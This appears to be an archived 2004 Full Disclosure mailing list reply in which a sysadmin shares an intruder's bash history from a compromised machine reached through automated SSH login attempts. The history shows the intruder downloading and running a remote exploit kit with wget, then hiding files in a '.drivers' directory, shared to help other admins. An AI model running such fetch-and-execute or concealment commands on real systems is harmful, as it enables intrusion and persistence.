Full Disclosure mailing list archives
Re: Re: Automated SSH login attempts?
From: andrewg () felinemenace org
Date: Fri, 30 Jul 2004 06:36:02 -0700
Greetings list, Accidentially sent only to Stefan, so redoing it. On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
Hmmm - I have also been getting those login attemps, but thought them to be harmless. Maybe they are not *that* harmless, though... Today I managed to get my hands on a machine that was originating such login attempts. I must admit I am far from being a linux security expert, but this is what I've found out up to now:
I got a similar experience from a game box I look after (void.labs.pulltheplug.com, but people may prefer http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ irc.pulltheplug.com, #social or #vortex). The .bash_history is as follows: passwd uname -a cat /etc/issue w /sbin.ifconfig /sbin/ifconfig wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt ftp ftp.sh3ll.info lynx lynx www.sh3ll.info/milenium/xpl.tgz ls ls -alF tar zxv xpl.tgz tar zxvf xpl.tgz cd supe` cd super ./prt lynx mil3nium.go.ro/milenium lynx mil3nium.go.ro/ ncftp ncftpget lynx sh3ll.info/milenium/milenium ls ls -alF ps -aux |grep test lynx sh3ll.info/milenium/psy1985.tgz mkdir .drivers mv psy1985.tgz .drivers cd .drivers tar zxvf psy1985.tgz rm -rf psy1985.tgz cd nsmail/ PATH='.:$PATH' inetd -e -o It would appear that if they can't get a local root, they'll use the box for IRCing from. Hopefully this helps someone. I haven't looked too much into this, if wanted I could grab the source ip addresses used for logging into guest, but thats probably not overly useful. Thanks, Andrew Griffiths _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Re: Automated SSH login attempts?, (continued)
- Re: Re: Automated SSH login attempts? Andrei Galca-Vasiliu (Jul 29)
- Re: Re: Automated SSH login attempts? Max Valdez (Jul 29)
- Re: Re: Automated SSH login attempts? dmargoli (Jul 29)
- Re: Re: Automated SSH login attempts? Ron DuFresne (Jul 29)
- Re: Re: Automated SSH login attempts? joe smith (Jul 29)
- Re: Re: Automated SSH login attempts? Andrei Galca-Vasiliu (Jul 29)
- Re: Re: Automated SSH login attempts? Andrei Galca-Vasiliu (Jul 29)
- Re: Re: Automated SSH login attempts? Max Valdez (Jul 29)
- Re: Re: Automated SSH login attempts? Dagur Valberg Johannsson (Jul 29)
- Re: Re: Automated SSH login attempts? dmargoli (Jul 29)
- Re: Re: Automated SSH login attempts? Stefan Janecek (Jul 30)
- Re: Re: Automated SSH login attempts? andrewg (Jul 30)
- Re: Re: Automated SSH login attempts? nicolas vigier (Jul 30)
- Re: Re: Automated SSH login attempts? morning_wood (Jul 30)
- Re: Automated SSH login attempts? Dan Margolis (Jul 30)